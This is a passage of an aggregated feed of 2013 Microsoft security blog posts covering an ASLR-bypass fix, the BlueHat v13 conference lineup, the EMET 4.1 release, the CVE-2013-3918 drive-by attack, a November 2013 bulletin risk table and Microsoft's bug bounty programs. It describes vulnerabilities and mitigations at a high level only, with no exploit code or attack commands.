is generally easier to identify DLL modules that fall into the first category (especially when expanding the search to third-party browser plugins and toolbars), while it is generally more difficult, and less reusable, to find or create a bypass for the other two categories. For example, two of the recent Internet Explorer exploits that were used in targeted attacks (<a href="http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx">CVE-2013-3893</a> and <a href="http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx">CVE-2013-3897</a>) both relied on the same ASLR bypass, which fell into the first category, making use of the HXDS.DLL library that is part of Office 2007/2010 and was not compiled using /DYNAMICBASE.</p> <p style="text-align: justify;">Bolstering the effectiveness of ASLR helps to harden the security of our products, and that is why MSRC continues to release tools and updates that enforce ASLR more broadly on Windows (such as <a href="http://support.microsoft.com/kb/2639308">KB2639308</a> and <a href="http://www.microsoft.com/emet">EMET</a>) and to release updates that close known ASLR bypasses as part of our defense-in-depth strategy (such as <a href="http://blogs.technet.com/b/srd/archive/2013/08/12/mitigating-the-ldrhotpatchroutine-dep-aslr-bypass-with-ms13-063.aspx">MS13-063</a> for the bypass presented at CanSecWest 2013).</p> <p style="text-align: justify;">Today <a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-106">MS13-106</a> closes one additional known bypass that will no longer be available to attackers.</p> <p style="text-align: justify;">- Elia Florio, MSRC Engineering</p><div style="clear:both;"></div> <h1>BlueHat v13 is Coming</h1> <p><a href="http://blogs.technet.com/b/bluehat/archive/2013/12/06/bluehat-v13-is-coming.aspx">http://blogs.technet.com/b/bluehat/archive/2013/12/06/bluehat-v13-is-coming.aspx</a>, Fri, 06 Dec 2013 23:34:00 GMT, BlueHat</p> <p>This week, starting Thursday, we&rsquo;ll be hosting our 13<sup>th</sup> edition of BlueHat. I&rsquo;m always so impressed with the level of knowledge we attract to each BlueHat, and while the event is invite-only, we&rsquo;ll be sharing glimpses into the event via this blog and the hashtag #BlueHat.</p> <p>For each of the past six years I have had the honor to work among some of the most talented engineers I have ever met, here at Microsoft. I am inspired by the mission we embrace in securing our products, devices, and services. There are few other vantage points with as broad a footprint on the internet, since one of Microsoft&rsquo;s early mottos helped put &ldquo;a computer in every home.&rdquo; Our job in the Microsoft Security Response Center (MSRC) is to help protect the customers who use the technology that the rest of the company works so hard to create. In everything we do in the MSRC, we strive to fulfill our mission to help ensure the security and privacy of over a billion computer systems and our customers worldwide.</p> <p>In 2005, we started the BlueHat conference to educate the developers and executives of Microsoft about current and emerging threats. 
The idea was to bring the hackers and security researchers to us, and in doing so foster an environment where the bidirectional exchange of ideas around the balance between security and functionality could meet fertile ground in the famed &ldquo;hallway track.&rdquo; We hand-pick just a small number of speakers and external attendees, concentrating in most cases on learning from them, and taking the chance to teach some of them what we have learned, to help enhance the security and privacy of the Internet as a whole.</p> <p>This year is no different in that we have invited speakers chosen to educate, amaze, and work with Microsoft to help us understand the emerging security threats to us and our customers. Together, we will rise to face the most important challenges in helping to secure the global Internet ecosystem.</p> <p>On Dec 12, 2013, we&rsquo;ll begin this year&rsquo;s BlueHat by focusing on the threat landscape, learning about determined adversaries to help us defend our own network and assets, and tools to detect and mitigate attacks. Next we&rsquo;ll welcome some of the world&rsquo;s top experts to discuss devices and services, from low-level hardware to web services, to help us build products, devices, and services that are more secure from the ground up.</p> <p>Finally, we&rsquo;ll close out the conference with a thought-provoking track that I like to call the &ldquo;Persistence of Trust,&rdquo; where we will discuss the core elements that comprise the trust we rely on to support what the Internet has become &ndash; a global information sharing network that humanity uses to exchange goods, services, money, and most importantly, ideas. To support these functions, we must strengthen the technology that underlies and supports that trust, and we must design products, devices, and services that are resistant to security and privacy breaches.</p> <p>Here&rsquo;s a quick overview of the planned speaker lineup for the two days of BlueHat v13.</p> <p><strong>Day 1: Thursday, December 12</strong></p> <p>Microsoft Technical Fellow Anders Vinberg will open BlueHat&rsquo;s first track, <strong>Threat Landscape</strong>. Anders will talk about a broad assurance initiative for the next wave, covering Windows Server and System Center, in close alignment with the Core OS team, identity, Office and Azure. Next, we&rsquo;ll set the stage with a talk from FireEye&rsquo;s Zheng Bu and YiChong Lin designed to walk us through the techniques of the average and not-so-average targeted attacker, and show us ways to detect and combat the adversary. Microsoft Partner Development Manager Mario Goertzel will then speak to some of the hard problems that we face in antimalware, specifically how we equip customers and partners with the right tools and analysis to help us all defend our networks and assets. Closing out the Threat Landscape track, Microsoft Principal Security Program Manager Lead Graham Calladine and Microsoft Senior Security Software Development Engineer Thomas Garnier will walk us through what attackers are doing now, how our current products and practices work against us, and how we can change this.</p> <p>After lunch, the <strong>Devices &amp; Services</strong> track kicks off with Josh Thomas, whose DARPA-funded research will reveal some hardware-level universal attacks that are possible on mobile devices. Next up we will have Microsoft&rsquo;s first Mitigation Bypass Bounty recipient, James Forshaw, talk about executing unsigned code on the Surface RT without jailbreaking it. Next, Microsoft Principal Software Development Engineer Lee Holmes will talk with us about PowerShell. Chris Tarnovsky will then discuss semiconductor devices and their backward steps in physical security through higher Common Criteria ratings. Next up, we&rsquo;ll hear from Microsoft Partner Development Manager Chris Kaler and Microsoft Senior Program Manager Serge Mera about the latest in Message Analyzer. Mario Heiderich will then take us into the wilds of JavaScript MVC and templating frameworks. The afternoon will wrap up with a call to action from our own Russ McRee, followed by several lightning talks.</p> <p><strong>Day 2: Friday, December 13</strong></p> <p>Taking into consideration the inevitable socializing from the night before, we&rsquo;re giving our attendees a slow morning. Between 9:00 AM and 12:00 noon we&rsquo;ll have a recovery brunch with mimosas, lightning talks, and the famed hallway track. I&rsquo;ll be the Day 2 keynote, opening the track <strong>Persistence of Trust</strong> at 12:30 PM. My talk will focus on security strategy at Microsoft, what we&rsquo;re doing in terms of our defensive industry partner programs like MAPP, and of course, I&rsquo;ll provide an update on our <a href="http://blogs.technet.com/b/bluehat/archive/2013/11/01/bounty-evolution-100-000-for-new-mitigation-bypass-techniques-wanted-dead-or-alive.aspx">strategic Bounty programs</a>. I&rsquo;ll then hand off to Justin Troutman, who will talk about Mackerel, a cryptographic design and development framework based on the premise that real-world cryptography is not about cryptography at all; it's about products. Peter Gutmann, famed researcher with the University of Auckland, New Zealand, will take the stage and illuminate the psychology of computer insecurity. After a short break, Alex Stamos, CTO of Artemis Internet, and Tom Ritter, Principal Security Engineer with iSEC Partners, will awaken us with tales of life after elliptic curve crypto&rsquo;s coming extinction. From Bromium Labs we&rsquo;ll hear from Rahul Kashyap and Rafal Wojtczuk, who will discuss and demonstrate how to reliably break out of various popular sandboxes. Finally, closing BlueHat v13, renowned security and privacy expert and advocate of human rights Morgan Marquis-Boire will explore what I call the elephant in the room, as he discusses the surveillance landscape and coercion-resistant design.</p> <p>As chair of the BlueHat content board, I would be remiss in my duty to the mission of BlueHat if I ignored the revelations of the summer of 2013 and the concerns about government surveillance of the internet. Hence, we will be continuing our internal dialog with a conversation with Morgan and others in attendance on how to design products, devices, and services that are more resistant to abuse and surveillance. For us, and for over a billion of our customers worldwide, this issue transcends borders and politics. We are a global company and part of a global community, and as such we will continue to work with our customers, partners, and even our competitors to ensure a safer, more trustworthy Internet for all.</p> <p>From the age of the great worms, to the evolution of more sophisticated and targeted attacks, to the era where modern warfare takes place not only on the information superhighway but also on the civilian streets of the Internet, we will serve faithfully in our mission to help protect our customers from security and privacy breaches, no matter the adversary.</p> <p>BlueHat is coming. 
Brace yourselves.</p> <p>Katie Moussouris</p> <p>Senior Security Strategist</p> <p>Microsoft Security Response Center</p> <p>http://twitter.com/k8em0</p> <p>(that&rsquo;s a zero)</p><div style="clear:both;"></div> <h1>Introducing Enhanced Mitigation Experience Toolkit (EMET) 4.1</h1> <p><a href="http://blogs.technet.com/b/srd/archive/2013/11/12/introducing-enhanced-mitigation-experience-toolkit-emet-4-1.aspx">http://blogs.technet.com/b/srd/archive/2013/11/12/introducing-enhanced-mitigation-experience-toolkit-emet-4-1.aspx</a>, Tue, 12 Nov 2013 21:00:00 GMT, swiat</p> <p>In June 2013, we released EMET 4.0 and customer response has been fantastic. Many customers across the world now include EMET as part of their defense-in-depth strategy and appreciate how EMET helps businesses prevent attackers from gaining access to computer systems. Today, we&rsquo;re releasing a new version, <a href="http://www.microsoft.com/en-us/download/details.aspx?id=41138">EMET 4.1</a>, with updates that simplify configuration and accelerate deployment.</p> <p>EMET anticipates the most common techniques adversaries might use and shields computer systems against those security threats. EMET uses security mitigation technologies such as Data Execution Prevention (DEP), Mandatory Address Space Layout Randomization (ASLR), Structured Exception Handler Overwrite Protection (SEHOP), Export Address Table Access Filtering (EAF), Anti-ROP, and SSL/TLS Certificate Trust Pinning, to help protect computer systems from new or undiscovered threats. 
EMET can also protect legacy applications or third party line of business applications where you do not have access to the source code.</p> <p>Today&rsquo;s EMET 4.1 release includes new functionality and updates, such as:</p> <ul> <li>Updated default protection profiles, Certificate Trust rules, and Group Policy Object configuration.</li> <li>Shared remote desktop environments are now supported on Windows servers where EMET is installed.</li> <li>Improved Windows Event logging mechanism allows for more accurate reporting in multi-user scenarios.</li> <li>Several application-compatibility enhancements and mitigation false positive reporting.</li> </ul> <p>EMET built by Microsoft Security Research Center (MSRC) engineering team, brings the latest in security science to your organization. While many EMET users exchange feedback and ideas at <a href="http://social.technet.microsoft.com/Forums/en/emet/threads">TechNet user forums</a>, a less known fact is that Microsoft Premier Support options are also available for businesses that deploy EMET within their enterprise. Many of our customers deploy EMET - at scale - through the Microsoft System Center Configuration manager and apply enterprise application, user and accounts rules through Group Policy. EMET works well with the tools and support options our customers know and use today.</p> <p>As we continue to advance EMET, we welcome your feedback on what you like and what additional features would help in protecting your business. If you are attending <a href="http://www.rsaconference.com/">RSA Conference</a> at San Francisco, or the <a href="https://www.blackhat.com/us-13/">Blackhat Conference</a> in Las Vegas next year, be sure to stop by the Microsoft booth, and share your feedback with us. We look forward to hearing from you. 
&nbsp;&nbsp;</p> <p>&nbsp;</p> <p><a href="http://www.microsoft.com/emet">The EMET Team</a></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3609984&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">mitigationEMET Technical details of the targeted attack using IE vulnerability CVE-2013-3918http://blogs.technet.com/b/srd/archive/2013/11/12/technical-details-of-the-targeted-attack-using-cve-2013-3918.aspxTue, 12 Nov 2013 18:02:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:30f068c7-fab9-4f03-b8c5-ccf96e5cc4e7swiat0<p>Over the weekend we became aware of an <a href="http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html">active attack</a> relying on a previously unknown remote code execution vulnerability in a legacy ActiveX component used by Internet Explorer. We are releasing this blog to confirm <a href="http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx">one more time</a> that the code execution vulnerability will be fixed in today&rsquo;s Update Tuesday release and to clarify some details about the second vulnerability reported.</p> <p>The attack was disclosed to us by our security partners. It is a typical targeted &ldquo;drive-by&rdquo; attack: a specific legitimate website was compromised and an additional piece of code was added by the attackers. The samples we have analyzed so far target only older Internet Explorer versions (IE7 and IE8) running on Windows XP, because that platform lacks the additional security mitigations of newer ones (Windows 7 is affected but not under active attack). 
<a href="http://www.microsoft.com/emet">EMET</a> was able to proactively mitigate this exploit.</p> <p>The exploit was created by combining two distinct vulnerabilities with different impact and severity ratings:</p> <ol> <li>a remote code execution vulnerability (<a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-090">CVE-2013-3918</a>) in the InformationCardSigninHelper ActiveX component used by Internet Explorer;</li> <li>an information disclosure vulnerability (no CVE assigned yet) used by the attackers only to improve the reliability of the exploit and to create ROP payloads tailored to the victim&rsquo;s machine.</li> </ol> <p>The <span style="text-decoration: underline;">remote code execution vulnerability</span>, which carries the higher severity rating, is fixed in today&rsquo;s Patch Tuesday release, and we advise customers to prioritize the deployment of <a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-090">MS13-090</a> in their monthly rollout. As usual, customers with Automatic Updates enabled will not need to take any action to receive the update and will be protected automatically.</p> <p>The <span style="text-decoration: underline;">information disclosure vulnerability</span> does not allow remote code execution on its own, so it has a lower severity rating; it is typically used in combination with another high-severity bug (as happened with CVE-2013-3918) to improve the effectiveness of exploitation. This vulnerability also requires the attackers to know in advance the paths and filenames present on the targeted machine in order to be exploited successfully. 
This vulnerability was not used to bypass ASLR; it was used only to remotely determine the exact version of a particular DLL on disk so that a more precise ROP payload could be built (it is a local information disclosure rather than a memory-address disclosure).</p> <p>We are still investigating the impact and root cause of the information disclosure vulnerability and we may follow up with additional information and mitigations as they become available.</p> <p>&nbsp;</p> <p>Elia Florio &ndash; MSRC Engineering</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3610040&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">MS13-0900dayZero-Day ExploitInformationCardSigninHelperIECVE-2013-3918EMET Assessing risk for the November 2013 security updateshttp://blogs.technet.com/b/srd/archive/2013/11/12/assessing-risk-for-the-november-2013-security-updates.aspxTue, 12 Nov 2013 18:01:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:8ba5aa57-568b-4bc7-9dac-8325679bc402swiat0<p>Today we released eight security bulletins addressing 19 CVEs. Three bulletins have a maximum severity rating of Critical while the other five have a maximum severity rating of Important. 
We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</p> <table border="1"> <tbody> <tr> <td><strong>Bulletin</strong></td> <td><strong>Most likely attack vector</strong></td> <td><strong>Max Bulletin Severity</strong></td> <td><strong>Max Exploitability Index</strong></td> <td><strong>Likely first 30 days impact</strong></td> <td><strong>Platform mitigations and key notes</strong></td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-090">MS13-090</a> <p>(ActiveX killbit)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Expect to continue seeing drive-by attacks leveraging CVE-2013-3918.</td> <td>Addresses the out-of-bounds memory access vulnerability mentioned on the FireEye blog on Friday: <a href="http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html">http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html</a>. 
&nbsp;More information about this attack can be found on our blog at&nbsp;<a href="http://blogs.technet.com/b/srd/archive/2013/11/12/technical-details-of-the-targeted-attack-using-cve-2013-3918.aspx">http://blogs.technet.com/b/srd/archive/2013/11/12/technical-details-of-the-targeted-attack-using-cve-2013-3918.aspx</a></td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-088">MS13-088</a> <p>(Internet Explorer)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-089">MS13-089</a> <p>(Windows GDI)</p> </td> <td>Victim opens a malicious .WRI file in WordPad.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>This update addresses a vulnerability in converting a BMP to WMF. While the WordPad vector alone would be only &ldquo;Important&rdquo; severity, we believe other attack vectors may exist if third-party applications are installed. Those attack vectors may not require user interaction. 
Therefore, out of an abundance of caution, we&rsquo;ve rated this bulletin &ldquo;Critical&rdquo;.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-091">MS13-091</a> <p>(Word)</p> </td> <td>Victim opens malicious Word document.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-092">MS13-092</a> <p>(Hyper-V)</p> </td> <td>Attacker running code inside a virtual machine can cause bugcheck of host hypervisor system; or potentially execute code in another VM running on same hypervisor system.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable denial-of-service exploit developed within next 30 days.</td> <td>Guest -&gt; Host is denial-of-service (bugcheck). Guest -&gt; Guest has potential for code execution.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-093">MS13-093</a> <p>(AFD.sys)</p> </td> <td>Attacker running code at low privilege runs malicious EXE to reveal kernel memory addresses and contents.</td> <td>Important</td> <td>n/a</td> <td>No chance for direct code execution. Information disclosure only.</td> <td>Affects only 64-bit systems. Does not affect Windows 8.1.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-094">MS13-094</a> <p>(Outlook)</p> </td> <td>Attacker sends victim S/MIME email that triggers a number of HTTP requests during S/MIME signature validation. Because requests can be sent to an arbitrary host and port, timing differences can reveal to the attacker which hosts and ports are accessible to the victim&rsquo;s computer.</td> <td>Important</td> <td>n/a</td> <td>No chance for direct code execution. Information disclosure only.</td> <td>This vulnerability can be leveraged to &ldquo;port scan&rdquo; several thousand ports per S/MIME email opened by victim. 
Signature verification for multiple S/MIME signers in this way will take some time and will block Outlook during the process.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-095">MS13-095</a> <p>(Digital signature parsing denial-of-service)</p> </td> <td>Attacker sends a malformed X.509 certificate to a web service, causing a temporary resource-exhaustion denial-of-service condition.</td> <td>Important</td> <td>n/a</td> <td>No chance for direct code execution. Denial of service only.</td> <td>&nbsp;</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC Engineering</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3610122&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">Attack VectorRisk Asessmentrating Bounty Evolution: $100,000 for New Mitigation Bypass Techniques Wanted Dead or Alivehttp://blogs.technet.com/b/bluehat/archive/2013/11/01/bounty-evolution-100-000-for-new-mitigation-bypass-techniques-wanted-dead-or-alive.aspxFri, 01 Nov 2013 17:20:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:729f5d15-b280-4992-bde8-307b70bff06aBlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3607648http://blogs.technet.com/b/bluehat/archive/2013/11/01/bounty-evolution-100-000-for-new-mitigation-bypass-techniques-wanted-dead-or-alive.aspx#comments<p>Those who know me personally or follow me on Twitter are familiar with my obsession with karaoke. I do it as often as I can rope people into going with me, never forcing anyone to sing, though invariably everyone does &ndash; or at least sings from the sidelines to the songs they know. One of my all-time favorite songs is Bon Jovi&rsquo;s Wanted Dead or Alive, and it&rsquo;s the song in my head as I write this post. By the end, I hope to have a few more people singing along. 
Go ahead and load it into the playlist as you read on.</p> <p>Today, Microsoft is announcing the first evolution of its bounty programs, first announced in <a href="http://blogs.technet.com/b/bluehat/archive/2013/06/19/heart-of-blue-gold-announcing-new-bounty-programs.aspx">June of 2013</a>. We are expanding the pool of talent who can participate and submit novel mitigation bypass techniques and defensive ideas to include responders and forensic experts who find active attacks in the wild. That means more people can &ldquo;sing along&rdquo; to earn big bounty payouts than ever before.</p> <p>Today&rsquo;s news means we are going from accepting entries from only a handful of individuals capable of inventing new mitigation bypass techniques on their own, to potentially thousands of individuals or organizations who find attacks in the wild. Now, both finders and discoverers can turn in new techniques for $100,000.</p> <p>Our platform-wide defenses, or mitigations, are a kind of shield that protects the entire operating system and all the applications running on it. Individual bugs are like arrows.&nbsp; The stronger the shield, the less likely any individual bug or arrow can get through. Learning about &ldquo;ways around the shield,&rdquo; or new mitigation bypass techniques, is much more valuable than learning about individual bugs because insight into exploit techniques can help us defend against entire classes of attack as opposed to a single bug &ndash; hence, we are willing to pay $100,000 for these rare new techniques.</p> <p>Building upon the success of our strategic bounty programs, Microsoft is evolving the bounty landscape to the benefit of our customers. The bounty programs we have created are designed to change the dynamics and the economics of the current vulnerability market. We currently do this in a few ways:</p> <ol start="1"> <li> <p>Offering bounties for bugs when other buyers typically are not buying them (e.g. 
during the preview/beta period) allows Microsoft to get a number of critical bugs out of the market before they are widely traded in grey or black markets and subsequently used to attack customers.</p> </li> <li> <p>Offering <a href="http://blogs.technet.com/b/bluehat/archive/2013/10/08/congratulations-to-james-forshaw-recipient-of-our-first-100-000-bounty-for-new-mitigation-bypass-techniques.aspx">researchers a $100,000 bounty</a>&nbsp;to teach us new mitigation bypass techniques enables us to build better defenses&nbsp;into our products faster and to provide workarounds and mitigations through tools such as <a href="http://www.microsoft.com/en-us/download/details.aspx?id=39273">EMET</a>.</p> </li> <li> <p>Evolving our bounty programs to include responders and forensic experts, who can turn in techniques that are being used in active attacks, enables us to work on building better defenses in to our products. We will&nbsp;work whenever possible with our <a href="http://www.microsoft.com/security/msrc/collaboration/mapp.aspx">MAPP program</a> and engage our community network of defenders to help mitigate these attacks more rapidly.</p> </li> </ol> <p>In this new expansion of Microsoft&rsquo;s bounty programs, organizations and individuals are eligible to submit Proof-of-Concept code and technical analysis of exploits they find in active use in the wild for our standard bounty amount of up to $100,000. Participants would also be eligible for up to $50,000 in addition if they also submit a qualifying defense idea. 
The <a href="http://www.microsoft.com/security/msrc/report/bypass_bounty.aspx">submission criteria for both programs</a> are&nbsp;similar &ndash; but the source may be different.</p> <p><strong>To participate in the expanded bounty program, organizations must pre-register with us before turning in a submission by emailing us at doa [at] Microsoft [dot] com.</strong> After you preregister and sign an agreement, then we&rsquo;ll accept an entry of technical write-up and proof of concept code for bounty consideration.<br /><br />We want to learn about these rare new exploitation techniques as early as possible, ideally before they are used, but we&rsquo;ll pay for them even if they are currently being used in targeted attacks if the attack technique is new &ndash; because we want them dead or alive.</p> <p>This evolution of our bounty programs is designed to further disrupt the vulnerability and exploit markets.&nbsp;Currently, black markets pay high prices for vulnerabilities and exploits based on factors that include exclusivity and longevity of usefulness before a vendor discovers and mitigates it.&nbsp; By expanding our bounty program, Microsoft is cutting down the time that exploits and vulnerabilities purchased on the black market remain useful, especially for targeted attacks that rely on stealthy exploitation without discovery.</p> <p>We shall see how the song plays out, but I for one am excited for more singers to step up to the microphone, or to sing out from the sidelines.</p> <p>&nbsp;</p> <p>Katie Moussouris</p> <p>Senior Security Strategist and karaoke MC</p> <p>Microsoft Security Response Center</p> <p><a href="http://twitter.com/k8em0">http://twitter.com/k8em0</a><br />(that&rsquo;s a zero)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3607648&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1"> Congratulations to James Forshaw Recipient of Our First $100,000 Bounty for New Mitigation Bypass 
Techniques!http://blogs.technet.com/b/bluehat/archive/2013/10/08/congratulations-to-james-forshaw-recipient-of-our-first-100-000-bounty-for-new-mitigation-bypass-techniques.aspxTue, 08 Oct 2013 16:47:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:b6872250-b7f5-4cfe-b181-57356ecbacbfBlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3601174http://blogs.technet.com/b/bluehat/archive/2013/10/08/congratulations-to-james-forshaw-recipient-of-our-first-100-000-bounty-for-new-mitigation-bypass-techniques.aspx#comments<p>Congratulations to James Forshaw for coming up with a new exploitation technique to get our first ever $100,000 bounty. A security vulnerability researcher with <a href="http://www.contextis.com/">Context Information Security</a>, James already came in hot with design level bugs he found during the <a href="http://www.microsoft.com/security/msrc/report/acknowledgement.aspx">IE11 Preview Bug Bounty</a>, and we&rsquo;re thrilled to give him even more money for helping us improve our platform-wide security by leaps.</p> <p>Coincidentally, one of our brilliant engineers at Microsoft, Thomas Garnier, had also found a variant of this class of attack technique. Microsoft engineers like Thomas are constantly evaluating ways to improve security, but James&rsquo; submission was of such high quality and outlined some other variants such that we wanted to award him the full $100,000 bounty.</p> <p>While we can&rsquo;t go into the details of this new mitigation bypass technique until we address it, we are excited that we will be better able to protect customers by creating new defenses for future versions of our products because we learned about this technique and its variants.</p> <p>The reason we pay so much more for a new attack technique versus for an individual bug is that learning about new mitigation bypass techniques helps us develop defenses against entire classes of attack. 
This knowledge helps us make individual vulnerabilities less useful when attackers try to use them against customers. When we strengthen the platform-wide mitigations, we make it harder to exploit bugs in all software that runs on our platform, not just Microsoft applications.</p> <p>If you have a new mitigation bypass technique that can defeat our latest platform-wide mitigations, or new defense idea, and would like to participate in our bounty programs, please see the official guidelines <a href="http://www.microsoft.com/security/msrc/report/bypass_bounty.aspx">here</a>. For a technical description of an exploitation technique that would have qualified, please read the SRD blog by Matt Miller and William Peteroy <a href="http://blogs.technet.com/b/srd/archive/2013/08/12/mitigating-the-ldrhotpatchroutine-dep-aslr-bypass-with-ms13-063.aspx">here</a>. If you have an idea that&rsquo;s in scope, please send in your whitepaper and proof of concept code to secure [at] Microsoft [dot] com.</p> <p>We&rsquo;re not done evolving our freshly minted bounty programs, which have now paid out over $128,000.&nbsp;Watch this blog for future developments as we continue to hone the biggest ongoing vendor bounty program in the industry.</p> <p>Until then, our special thanks go to James: Congratulations and well done! You not only made history by receiving a total of $109,400 from our bounty programs, you&rsquo;re also helping us make our customers safer from entire classes of attack. 
On behalf of over a billion people worldwide -- Thank you and way to go!!</p> <p>&nbsp;</p> <p>Katie Moussouris</p> <p>Senior Security Strategist, Microsoft Security Response Center</p> <p><a href="http://twitter.com/k8em0">http://twitter.com/k8em0</a><br />(that&rsquo;s a zero)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3601174&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1"> Bounty News Update: Bountiful Harvesthttp://blogs.technet.com/b/bluehat/archive/2013/10/04/bounty-news-update-bountiful-harvest.aspxFri, 04 Oct 2013 20:21:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e49b8a72-db18-49ad-8ead-9e581f3f8f63BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3600645http://blogs.technet.com/b/bluehat/archive/2013/10/04/bounty-news-update-bountiful-harvest.aspx#comments<p>Fall is a season traditionally associated with a harvest after planting the seeds and tending the crops.&nbsp;Today I&rsquo;m proud to announce the names of six very smart people who have helped us make our products more secure by participating in our new bounty programs.&nbsp; When we launched <a href="http://blogs.technet.com/b/bluehat/archive/2013/06/19/heart-of-blue-gold-announcing-new-bounty-programs.aspx">our bounty programs in June</a> this year, we had a few strategic goals in mind:</p> <ul> 
<li>Increase the win-win between the hacker/security researcher community and Microsoft&rsquo;s customers, and build relationships with new researchers in the process</li> <li>Receive more vulnerability reports earlier in the release cycle of our products, ideally during the beginning of the preview (or beta) period</li> <li>Learn about new exploitation techniques that can be used to defeat our platform-wide defenses, so we can build protections against entire classes of attack</li> </ul> <p>Now that we have permission from the bounty program recipients to publish their names and bounty amounts, I&rsquo;ll list them all <a href="http://www.microsoft.com/security/msrc/report/acknowledgement.aspx">here</a>.&nbsp;You may have seen a few congratulatory and celebratory tweets; we wanted to officially acknowledge these security researchers who have helped our customers by participating in our bounty programs.</p> <p>&nbsp;</p> <p align="center"><span style="font-size: medium;"><strong>On behalf of over a billion customers, THANK YOU!</strong> </span><br /><span style="font-size: medium;">James Forshaw </span><br /><span style="font-size: medium;">Ivan Fratric </span><br /><span style="font-size: medium;">Jose Antonio Vazquez Gonzalez </span><br /><span style="font-size: medium;">Masato Kinugawa </span><br /><span style="font-size: medium;">Fermin J. Serna </span><br /><span style="font-size: medium;">Peter Vreugdenhil</span></p> <p>&nbsp;</p> <p>I am also thrilled to highlight a few of our bounty program results:</p> <p><strong>Overall:</strong></p> <p>We&rsquo;ve worked with so many bright security researchers through the years, and are thrilled that through the bounty programs, we received reports from researchers who had never reported to us directly before. 
This means we have even more great minds interested in working directly with us to help make our products more secure.</p> <p><strong>IE11 Preview Bug Bounty:</strong></p> <p>During the first 30 days of the IE11 preview period we received several vulnerabilities that qualified for a bounty, in contrast to the first 30 days of the IE10 beta, when we did not receive any bulletin-class reports. The preview period is a great time for us to receive these reports because we can address the issues earlier. Researchers often do not report such findings until after the code has been released to manufacturing. With these submissions, we will be able to address these vulnerabilities earlier in the process, providing a more secure version of Internet Explorer.</p> <p>As the leaves turn colors and the temperatures cool off, I&rsquo;m happy to be sharing the bountiful harvest of our programs, started as seeds planted in early summer. It&rsquo;s been a great first three months of Microsoft&rsquo;s bounty programs, and we&rsquo;re overjoyed that our programs have been met with great participation and enthusiasm from the hacker community.</p> <p>Stay tuned for more news coming soon!</p> <p>Katie Moussouris<br />Senior Security Strategist, Microsoft Security Response Center<br /><a href="https://twitter.com/k8em0">http://twitter.com/k8em0</a> &nbsp;(that&rsquo;s a zero)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3600645&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1">bountyprogramsZero-Day ExploitBounty New Whitepaper on SDL adoptionhttp://blogs.msdn.com/b/sdl/archive/2013/09/19/new-whitepaper-on-sdl-adoption.aspxThu, 19 Sep 2013 17:19:49 GMT91d46819-8472-40ad-a661-2c78acb4018c:10450555SDL Team2http://blogs.msdn.com/b/sdl/rsscomments.aspx?WeblogPostID=10450555http://blogs.msdn.com/b/sdl/archive/2013/09/19/new-whitepaper-on-sdl-adoption.aspx#comments<p><span style="color: #333333; font-family: 'Segoe UI','sans-serif'; mso-ansi-language: EN;" lang="EN">Arjuna Shunn here.&nbsp; Our friends over on the <a href="http://blogs.technet.com/b/security/">security blog</a> have just released a new whitepaper discussing the value of SDL in the financial sector.&nbsp; Feel free to take a look and grab the whitepaper; it is definitely worth taking the time to read through and see how the Microsoft SDL has helped the financial services industry and can help other industries as well.</span></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10450555" width="1" height="1"> MAPP Initiatives Update – Knowledge Exchange 